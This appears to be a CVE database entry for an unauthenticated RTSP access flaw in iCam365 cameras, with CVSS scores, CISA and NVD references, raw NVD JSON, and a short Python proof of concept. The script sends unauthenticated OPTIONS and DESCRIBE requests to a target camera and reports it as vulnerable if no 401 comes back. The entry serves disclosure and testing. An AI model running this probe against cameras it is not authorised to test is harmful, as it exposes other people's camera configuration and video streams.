CVE-2025-62674

Description

The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

iCam365及相关摄像头产品（具体版本需参考厂商官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import sys

def rtsp_unauthorized_access(target_ip, port=554):
    """
    CVE-2025-62674 PoC - RTSP Unauthenticated Access
    This script demonstrates unauthorized access to RTSP service
    """
    try:
        # RTSP OPTIONS request without authentication
        options_request = f'OPTIONS rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        options_request += f'CSeq: 1\r\n'
        options_request += '\r\n'
        
        # RTSP DESCRIBE request without authentication
        describe_request = f'DESCRIBE rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        describe_request += f'CSeq: 2\r\n'
        describe_request += 'Accept: application/sdp\r\n'
        describe_request += '\r\n'
        
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))
        
        print(f'[*] Sending OPTIONS request to {target_ip}:{port}')
        sock.send(options_request.encode())
        response1 = sock.recv(4096).decode('utf-8', errors='ignore')
        print(f'[*] OPTIONS Response:\n{response1}')
        
        print(f'[*] Sending DESCRIBE request to {target_ip}:{port}')
        sock.send(describe_request.encode())
        response2 = sock.recv(8192).decode('utf-8', errors='ignore')
        print(f'[*] DESCRIBE Response:\n{response2}')
        
        # Check if authentication is required
        if '401' not in response2 and 'Unauthorized' not in response2:
            print('[!] VULNERABLE: RTSP service allows unauthenticated access!')
            return True
        else:
            print('[*] NOT VULNERABLE: Authentication is required')
            return False
            
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False
    finally:
        sock.close()

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
        rtsp_unauthorized_access(target, port)
    else:
        print('Usage: python cve-2025-62674.py <target_ip> [port]')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62674
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62674
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62674/
[4] VulDB https://vuldb.com/cve/CVE-2025-62674
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json
[6] https://icam365.net/en/aboutUs/
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62674", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:05.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json", "source": "[email protected]"}, {"url": "https://icam365.net/en/aboutUs/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02", "source": "[email protected]"}]}}